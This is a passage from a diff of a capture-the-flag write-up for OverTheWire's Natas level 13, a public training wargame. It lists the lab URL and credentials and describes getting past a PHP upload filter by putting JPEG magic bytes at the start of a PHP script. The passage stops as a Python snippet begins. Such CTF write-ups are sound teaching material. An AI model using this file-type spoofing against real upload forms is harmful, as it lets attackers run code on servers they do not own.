Reda-BELHAJ/OverTheWire/Natas/Natas10-20/Level13.md

 The ***URL*** to which you need to connect is *http://natas13.natas.labs.overthewire.org*.
 The ***username*** is *natas13* and the ***password*** is *jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY*.

 Lets check the [viewsource](http://natas13.natas.labs.overthewire.org/index-source.html) link.
-By analyzing the php script in the source code We see a exif_imagetype bypass So Lets make a php file with a jpeg signature "\xFF\xD8\xFF\xE0"
+By analyzing the php script in the source code We see a exif_imagetype bypass.
+So Lets make a php file with a jpeg signature "\xFF\xD8\xFF\xE0"

 ```Python
 fh = open('script.php', 'w')